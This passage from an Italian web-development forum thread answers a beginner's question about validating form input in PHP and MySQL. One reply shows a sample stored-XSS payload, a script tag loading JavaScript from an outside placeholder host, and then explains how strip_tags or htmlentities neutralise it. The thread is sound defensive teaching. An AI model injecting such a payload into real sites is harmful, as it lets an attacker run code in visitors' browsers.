Pagina 1 di 3 1 2 3 ultimoultimo
Visualizzazione dei risultati da 1 a 10 su 25
    Utente di HTML.it L'avatar di gabar-el

controlli php mysql quali fare e in base a cosa?

ciao, non sono molto esperto di php e mysql. cmq ho un piccolo form che serve come aggiornamento di un db. Ho letto che occorre fare dei controlli vari. Mi sono un pò informato ma non ho capito molto, quel pò che ho capito è che dipende da ciò che faccio con il db. Es. se non inseriranno mai del codice html, non importa faccia un controllo a riguardo giusto?
    Fondamentalmente non credo di dover fare grandi controlli, ma chiedo a voi. Al momento è possibile inserire lettere accentate e altri caratteri senza problemi, si riesce a inserire apici singoli e doppi senza problemi, quindi che altro fare? forse ci sono controlli circa qualche misura di sicurezza?
    grazie
    Si fanno sempre nuove scoperte

Utente di HTML.it L'avatar di gianiaz
    Il modo corretto per affrontare questo problema, è pensare in quali modi non convenzionali potranno essere usate le tue interfacce, se ti fermi a pensare per cosa è stata studiata la tua interfaccia non vedrai mai i potenziali problemi.

In linea di massima comunque i controlli vanno fatti sempre e comunque.

Un esempio potrebbe essere un guestbook, con un campo textarea semplice, se io nel guestbook ti scrivo:

codice:
    <script type="text/javascript" src="http://www.altrosito.com/miojs.js"></script>
    Posso caricare nel tuo sito un mio file javascript che può scrivere all'interno della tua pagina qualsiasi cosa.

Questa tecnica è conosciuta come XSS (che sta per cross site scripting).

(per questa cosa basta usare strip_tags per togliere i tag, oppure htmlentities per trasformare i caratteri < in relative entità html facendo perdere il senso dei tag che verranno letti dal browser).

Nel caso di strip_tags il testo nell'esempio diventerà vuoto, nel caso di htmlentities vedrai il codice ma questo non verrà interpretato.